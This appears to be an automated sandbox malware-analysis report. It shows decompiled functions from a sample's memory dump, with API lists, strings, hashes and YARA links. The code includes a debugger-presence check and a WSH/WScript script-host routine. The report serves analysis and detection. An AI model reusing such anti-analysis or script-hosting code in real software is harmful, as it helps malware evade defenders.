Instruction Fuzzy Hash: 0BE0863A751650CFC3A0DA59C480D56F3E9EB8C2B07164479EA69D3716D330FC00C650

Uniqueness

Uniqueness Score: -1.00%

Function 004081DD, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004081DD(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00409013(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x004081ea
0x004081ec
0x004081ef
0x004081f2
0x004081f5
0x00408206
0x00408208
0x004081f7
0x004081fb
0x00408204
0x00000000
0x00000000
0x00408204
0x0040820d

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1309330b26bbd4996c8968a0efc670034eac60ab60495bc0805cbd69c1388f86
Instruction ID: 70ebf834586dc0c3d3b7384857c130d04f94947386e354d864e975431442ecd0
Opcode Fuzzy Hash: 1309330b26bbd4996c8968a0efc670034eac60ab60495bc0805cbd69c1388f86
Instruction Fuzzy Hash: 72E08C32911228EBCB24DB89CA0498AF3ECEB84B04B1140AFB511E3242C674DE00CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 021F099F, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 004011C0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004011C0(short* _a4, intOrPtr _a8) {
				long _v8;
				void* _v12;
				short* _v16;
				long _v20;
				long _v24;
				short _v152;
				short _v280;
				long _t40;

				_v8 = RegOpenKeyW(0x80000000, _a4,  &_v12);
				if(_v8 == 0) {
					_v8 = RegQueryValueW(_v12, 0,  &_v152,  &_v20);
					RegCloseKey(_v12);
					if(_v8 == 0) {
						lstrcatW( &_v152, L"\\ScriptEngine");
						_v8 = RegOpenKeyW(0x80000000,  &_v152,  &_v12);
						if(_v8 == 0) {
							_v8 = RegQueryValueW(_v12, 0,  &_v280,  &_v20);
							_t40 = RegCloseKey(_v12);
							if(_v8 == 0) {
								__imp__CLSIDFromProgID( &_v280, _a8);
								_v24 = _t40;
								if(_v24 < 0) {
									_v16 = 0;
								} else {
									_v16 = 1;
								}
								return _v16;
							}
							return 0;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x004011dc
0x004011e3
0x00401203
0x0040120a
0x00401214
0x00401229
0x00401245
0x0040124c
0x00401269
0x00401270
0x0040127a
0x0040128b
0x00401291
0x00401298
0x004012a3
0x0040129a
0x0040129a
0x0040129a
0x00000000
0x004012aa
0x00000000
0x0040127c
0x00000000
0x0040124e
0x00000000
0x00401216
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000000,?,?), ref: 004011D6
RegQueryValueW.ADVAPI32(?,00000000,?,?), ref: 004011FD
RegCloseKey.ADVAPI32(?), ref: 0040120A

Strings

\ScriptEngine, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: \ScriptEngine
API String ID: 3677997916-4133095719
Opcode ID: a89d4df85d6b9e36a099648a8f152397b7df53a3883837d5ce00e7a505109de5
Instruction ID: b1b0978277b733587fd6350f7c9f4209b09e7cd3a31cfb2b49838eb73817f5ed
Opcode Fuzzy Hash: a89d4df85d6b9e36a099648a8f152397b7df53a3883837d5ce00e7a505109de5
Instruction Fuzzy Hash: 6531D975900208EFDB14DBE0CA48BEEB7B8AB48305F1084BAE606B7590D7785A49DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004012C0, Relevance: 15.1, APIs: 10, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004012C0(WCHAR* _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v24;
				short* _v28;
				int _t34;

				_v8 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 1, 0);
				if(_v8 != 0xffffffff) {
					_v24 = GetFileSize(_v8, 0);
					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
					CloseHandle(_v8);
					if(_v16 != 0xffffffff) {
						_v12 = MapViewOfFile(_v16, 4, 0, 0, 0);
						CloseHandle(_v16);
						if(_v12 != 0) {
							_t34 = MultiByteToWideChar(0, 0, _v12, _v24, 0, 0);
							_v20 = _t34;
							__imp__#4(0, _v20);
							_v28 = _t34;
							MultiByteToWideChar(0, 0, _v12, _v24, _v28, _v20);
							UnmapViewOfFile(_v12);
							return _v28;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x004012df
0x004012e6
0x004012fb
0x00401312
0x00401319
0x00401323
0x0040133b
0x00401342
0x0040134c
0x00401362
0x00401368
0x00401371
0x00401377
0x0040138e
0x00401398
0x00000000
0x0040139e
0x00000000
0x0040134e
0x00000000
0x00401325
0x00000000

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000001,00000000), ref: 004012D9
GetFileSize.KERNEL32(000000FF,00000000), ref: 004012F5
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040130C
CloseHandle.KERNEL32(000000FF), ref: 00401319

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$CloseHandleMappingSize
String ID:
API String ID: 3089540790-0
Opcode ID: 9e517d1670e694e13b417871d4e36ae5018fb6c5d8b7fa4c11f8a853eb3cd9bd
Instruction ID: 1df6038d868c7a6418a881a98720ad6b1c570608c67974a8479cbace5be712d5
Opcode Fuzzy Hash: 9e517d1670e694e13b417871d4e36ae5018fb6c5d8b7fa4c11f8a853eb3cd9bd
Instruction Fuzzy Hash: AE312D74E40208FFEB20DBE4DD46FAEB7B4AB48701F208575FA15F66D0C6746A409B68

Uniqueness

Uniqueness Score: -1.00%

Function 00408EC9, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408EC9(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x416310 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x410850 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00408950(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00408950(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00408ed2
0x00408f7c
0x00408eda
0x00408edc
0x00408ee3
0x00408ee5
0x00408eeb
0x00408ef8
0x00408f0d
0x00408f11
0x00408f63
0x00408f63
0x00408f68
0x00408f6c
0x00408f6f
0x00408f6f
0x00408f75
0x00408f77
0x00408f8c
0x00408f87
0x00408f8b
0x00408f8b
0x00408f79
0x00408f79
0x00000000
0x00408f79
0x00408f13
0x00408f1c
0x00408f53
0x00408f53
0x00408f55
0x00408f57
0x00000000
0x00000000
0x00408f5f
0x00000000
0x00408f5f
0x00408f26
0x00408f2b
0x00408f30
0x00000000
0x00000000
0x00408f3a
0x00408f3f
0x00408f44
0x00000000
0x00000000
0x00408f49
0x00408f4f
0x00000000
0x00408f4f
0x00408ef0
0x00000000
0x00000000
0x00000000
0x00408ef6
0x00408f85
0x00000000

Strings

ext-ms-, xrefs: 00408F34
api-ms-, xrefs: 00408F20

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9156bbfc067df576f8a8dfd647e4eccbe74487dc4a1fd8c3b45c59caeb10470d
Instruction ID: 58e31c0ee6054dad396b0b535bd9a6941ebe04213d74b6dd0a57fb4da420e811
Opcode Fuzzy Hash: 9156bbfc067df576f8a8dfd647e4eccbe74487dc4a1fd8c3b45c59caeb10470d
Instruction Fuzzy Hash: 69212631A05222ABD7315A34AE40B5B37659B057A0F25053AFD85B73D1DE38ED0186DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB38, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040AB38(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t242;
				signed int _t244;
				intOrPtr _t247;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr _t255;
				void* _t261;
				intOrPtr _t262;
				signed int _t263;
				signed int _t266;
				signed char _t267;
				intOrPtr _t270;
				signed int _t272;
				long _t273;
				signed int _t274;
				signed char* _t277;
				signed int _t280;
				signed int _t282;
				signed int _t286;
				signed int _t287;
				intOrPtr _t288;
				signed int _t289;
				struct _OVERLAPPED* _t291;
				struct _OVERLAPPED* _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t170 =  *0x4150a8; // 0x90cea005
				_v8 = _t170 ^ _t294;
				_t172 = _a8;
				_t266 = _t172 >> 6;
				_t244 = (_t172 & 0x0000003f) * 0x38;
				_t277 = _a12;
				_v108 = _t277;
				_v80 = _t266;
				_v112 =  *((intOrPtr*)(_t244 +  *((intOrPtr*)(0x416108 + _t266 * 4)) + 0x18));
				_v44 = _t244;
				_v96 = _a16 + _t277;
				_t178 = GetConsoleOutputCP();
				_t242 = 0;
				_v124 = _t178;
				E0040689E( &_v72, _t266, 0);
				_t282 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				_v104 = _t277;
				if(_t277 >= _v96) {
					L48:
					__eflags = _v60 - _t242;
				} else {
					while(1) {
						_t250 = _v44;
						_v51 =  *_t277;
						_v76 = _t242;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x416108 + _v80 * 4));
						_v48 = _t186;
						if(_t247 != 0xfde9) {
							goto L19;
						}
						_t211 = _t242;
						_t270 = _v48 + 0x2e + _t250;
						_v116 = _t270;
						while( *((intOrPtr*)(_t270 + _t211)) != _t242) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t272 = _v96 - _t277;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t277 & 0x000000ff) + 0x4157d8; // 0x0
							_t255 =  *_t72 + 1;
							_v48 = _t255;
							__eflags = _t255 - _t272;
							if(_t255 > _t272) {
								__eflags = _t272;
								if(_t272 <= 0) {
									goto L40;
								} else {
									_t287 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x416108 + _v80 * 4)) + _t287 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t277));
										_t242 =  &(_t242->Internal);
										__eflags = _t242 - _t272;
									} while (_t242 < _t272);
									goto L39;
								}
							} else {
								_v144 = _t242;
								__eflags = _t255 - 4;
								_v140 = _t242;
								_v56 = _t277;
								_v40 = (_t255 == 4) + 1;
								_t220 = E0040B88A( &_v144,  &_v76,  &_v56, (_t255 == 4) + 1,  &_v144);
								_t296 = _t295 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t288 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t250 + _v48 + 0x2e) & 0x000000ff) + 0x4157d8)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t272) {
								__eflags = _t272;
								if(_t272 > 0) {
									_t289 = _t250;
									do {
										_t227 =  *((intOrPtr*)(_t242 + _t277));
										_t261 =  *((intOrPtr*)(0x416108 + _v80 * 4)) + _t289 + _t242;
										_t242 =  &(_t242->Internal);
										 *((char*)(_t261 + _v40 + 0x2e)) = _t227;
										_t289 = _v44;
										__eflags = _t242 - _t272;
									} while (_t242 < _t272);
									L39:
									_t282 = _v88;
								}
								L40:
								_t286 = _t282 + _t272;
								__eflags = _t286;
								L41:
								__eflags = _v60;
								_v88 = _t286;
							} else {
								_t273 = _v40;
								_t291 = _t242;
								_t262 = _v116;
								do {
									 *((char*)(_t294 + _t291 - 0xc)) =  *((intOrPtr*)(_t262 + _t291));
									_t291 =  &(_t291->Internal);
								} while (_t291 < _t273);
								_t292 = _v48;
								_t263 = _v44;
								if(_v48 > 0) {
									E0040DE00( &_v16 + _t273, _t277, _t292);
									_t263 = _v44;
									_t295 = _t295 + 0xc;
									_t273 = _v40;
								}
								_t280 = _v80;
								_t293 = _t242;
								do {
									 *( *((intOrPtr*)(0x416108 + _t280 * 4)) + _t263 + _t293 + 0x2e) = _t242;
									_t293 =  &(_t293->Internal);
								} while (_t293 < _t273);
								_t277 = _v104;
								_t288 = _v48;
								_v120 =  &_v16;
								_v136 = _t242;
								_v132 = _t242;
								_v40 = (_v56 == 4) + 1;
								_t237 = E0040B88A( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t296 = _t295 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t277 = _t277 - 1 + _t288;
									L27:
									_t277 =  &(_t277[1]);
									_v104 = _t277;
									_t193 = E00407FFF(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t282 = _v84 - _v108 + _t277;
											_v88 = _t282;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t277 >= _v96) {
														goto L48;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t282 = _t282 + 1;
															_v88 = _t282;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t267 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t267 & 0x00000004;
						if((_t267 & 0x00000004) == 0) {
							_v33 =  *_t277;
							_t188 = E0040892C(_t267);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t277);
								goto L26;
							} else {
								_t100 =  &(_t277[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t274 = _v80;
									_t253 = _v44;
									 *((char*)(_t253 +  *((intOrPtr*)(0x416108 + _t274 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x416108 + _t274 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x416108 + _t274 * 4)) + 0x2d) | 0x00000004;
									_t286 = _t282 + 1;
									goto L41;
								} else {
									_t206 = E0040A0A2( &_v76, _t277, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t277 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t277;
							_push(2);
							 *(_t250 + _v48 + 0x2d) = _t267 & 0x000000fb;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E0040A0A2();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E004032D1(_v8 ^ _t294);
			}

0x0040ab43
0x0040ab4a
0x0040ab4d
0x0040ab55
0x0040ab58
0x0040ab65
0x0040ab68
0x0040ab6b
0x0040ab72
0x0040ab7a
0x0040ab7d
0x0040ab80
0x0040ab86
0x0040ab88
0x0040ab8f
0x0040ab99
0x0040ab9b
0x0040ab9e
0x0040aba1
0x0040aba4
0x0040aba7
0x0040abaa
0x0040abb0
0x0040aebb
0x0040aebb
0x00000000
0x0040abb6
0x0040abbe
0x0040abc1
0x0040abc7
0x0040abca
0x0040abd1
0x0040abd8
0x0040abdb
0x00000000
0x00000000
0x0040abe4
0x0040abe9
0x0040abeb
0x0040abee
0x0040abf3
0x0040abf7
0x00000000
0x00000000
0x00000000
0x0040abf7
0x0040abfc
0x0040abfe
0x0040ac03
0x0040acbd
0x0040acc4
0x0040acc5
0x0040acc8
0x0040acca
0x0040ae6e
0x0040ae70
0x00000000
0x0040ae72
0x0040ae72
0x0040ae75
0x0040ae84
0x0040ae88
0x0040ae89
0x0040ae89
0x00000000
0x0040ae8d
0x0040acd0
0x0040acd2
0x0040acd8
0x0040acdb
0x0040ace7
0x0040acf0
0x0040acfb
0x0040ad00
0x0040ad03
0x0040ad06
0x00000000
0x0040ad0c
0x0040ad0c
0x00000000
0x0040ad0c
0x0040ad06
0x0040ac09
0x0040ac18
0x0040ac19
0x0040ac1c
0x0040ac1f
0x0040ac24
0x0040ae3a
0x0040ae3c
0x0040ae3e
0x0040ae40
0x0040ae4a
0x0040ae52
0x0040ae54
0x0040ae55
0x0040ae59
0x0040ae5c
0x0040ae5c
0x0040ae60
0x0040ae60
0x0040ae60
0x0040ae63
0x0040ae63
0x0040ae63
0x0040ae65
0x0040ae65
0x0040ae69
0x0040ac2a
0x0040ac2a
0x0040ac2d
0x0040ac2f
0x0040ac32
0x0040ac35
0x0040ac39
0x0040ac3a
0x0040ac3e
0x0040ac41
0x0040ac46
0x0040ac50
0x0040ac55
0x0040ac58
0x0040ac5b
0x0040ac5b
0x0040ac5e
0x0040ac61
0x0040ac63
0x0040ac6c
0x0040ac70
0x0040ac71
0x0040ac75
0x0040ac7b
0x0040ac84
0x0040ac91
0x0040ac98
0x0040ac9c
0x0040aca7
0x0040acac
0x0040acb2
0x00000000
0x0040acb8
0x0040ad0f
0x0040ad10
0x0040ad93
0x0040ad9a
0x0040ada2
0x0040adaa
0x0040adaf
0x0040adb2
0x0040adb7
0x00000000
0x0040adbd
0x0040add2
0x0040aeb2
0x0040aeb8
0x00000000
0x0040add8
0x0040ade1
0x0040ade3
0x0040ade9
0x00000000
0x0040adef
0x0040adf3
0x0040ae29
0x0040ae2c
0x00000000
0x0040ae32
0x0040ae32
0x00000000
0x0040ae32
0x0040adf5
0x0040adf7
0x0040adf9
0x0040ae12
0x00000000
0x0040ae18
0x0040ae1c
0x00000000
0x0040ae22
0x0040ae22
0x0040ae25
0x0040ae26
0x00000000
0x0040ae26
0x0040ae1c
0x0040ae12
0x0040adf3
0x0040ade9
0x0040add2
0x0040adb7
0x0040acb2
0x0040ac24
0x00000000
0x0040ad14
0x0040ad14
0x0040ad18
0x0040ad1b
0x0040ad3d
0x0040ad40
0x0040ad45
0x0040ad49
0x0040ad4d
0x0040ad7b
0x0040ad7d
0x00000000
0x0040ad4f
0x0040ad4f
0x0040ad4f
0x0040ad52
0x0040ad55
0x0040ad58
0x0040ae8f
0x0040ae92
0x0040ae9f
0x0040aeaa
0x0040aeaf
0x00000000
0x0040ad5e
0x0040ad65
0x0040ad6a
0x0040ad6d
0x0040ad70
0x00000000
0x0040ad76
0x0040ad76
0x00000000
0x0040ad76
0x0040ad70
0x0040ad58
0x0040ad1d
0x0040ad24
0x0040ad29
0x0040ad2f
0x0040ad31
0x0040ad38
0x0040ad7e
0x0040ad81
0x0040ad82
0x0040ad87
0x0040ad8a
0x0040ad8d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ad8d
0x00000000
0x0040ad1b
0x0040abb6
0x0040aebe
0x0040aebe
0x0040aec0
0x0040aec3
0x0040aec3
0x0040aec3
0x0040aec3
0x0040aed5
0x0040aed7
0x0040aed8
0x0040aed9
0x0040aee3

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0040AB80
__fassign.LIBCMT ref: 0040AD65
__fassign.LIBCMT ref: 0040AD82
WriteFile.KERNEL32(?,00409851,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040ADCA
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040AE0A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040AEB2

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: d9a5e50a9b91e5dd8f8e49a72057e3a426c3303484b3f58c884a4c7180e47011
Instruction ID: 3117e9bacb1a1eccba6a9d08f52151470d89b525a91c6c0243df8fed3a777442
Opcode Fuzzy Hash: d9a5e50a9b91e5dd8f8e49a72057e3a426c3303484b3f58c884a4c7180e47011
Instruction Fuzzy Hash: 52C19F71D042589FCF14CFA8C8849EEBBB5EF08314F28417AE855BB381D2359D56CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00405FD3(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x40f16c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00405fd9
0x00405fdd
0x00405fe8
0x00405ff0
0x00405ffb
0x00406001
0x00406005
0x0040600c
0x00406012
0x00406012
0x00406014
0x00406019
0x00000000
0x0040601e
0x00406025

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00405F85,?,?,00405F4D,?,?,?), ref: 00405FE8
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00405FFB
FreeLibrary.KERNEL32(00000000,?,?,00405F85,?,?,00405F4D,?,?,?), ref: 0040601E

Strings

mscoree.dll, xrefs: 00405FE1
CorExitProcess, xrefs: 00405FF3

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c3d37bd2113eb20495809b35d6cd8355e5e6d3b71c3d77ae0755e8c65ab35b8d
Instruction ID: 52b69b0a254760e163a2c2203ff1c395fca13042c5b59be6e0adffc2ece0bb65
Opcode Fuzzy Hash: c3d37bd2113eb20495809b35d6cd8355e5e6d3b71c3d77ae0755e8c65ab35b8d
Instruction Fuzzy Hash: 32F08230541119FBDB31DB50DE09B9EBEB8DB44755F104072E505F65E1DB748E08DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401040, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 31
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401040(WCHAR* _a8, signed int _a12, intOrPtr* _a20) {
				intOrPtr _t9;
				intOrPtr* _t14;
				intOrPtr _t20;

				if(lstrcmpW(_a8, ?str?) == 0 || lstrcmpW(_a8, L"WScript") == 0) {
					if((_a12 & 0x00000002) != 0) {
						_t9 =  *0x416648; // 0x0
						_t14 =  *0x416648; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t14 + 4))))(_t9);
						_t20 =  *0x416648; // 0x0
						 *_a20 = _t20;
					}
					return 0;
				} else {
					return 0x80004005;
				}
			}

0x00401054
0x00401076
0x00401078
0x0040107e
0x00401089
0x0040108e
0x00401094
0x00401094
0x00000000
0x00401069
0x00000000
0x00401069

APIs

lstrcmpW.KERNEL32(?,WSH), ref: 0040104C
lstrcmpW.KERNEL32(?,WScript), ref: 0040105F

Strings

WScript, xrefs: 00401056
WSH, xrefs: 00401043

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
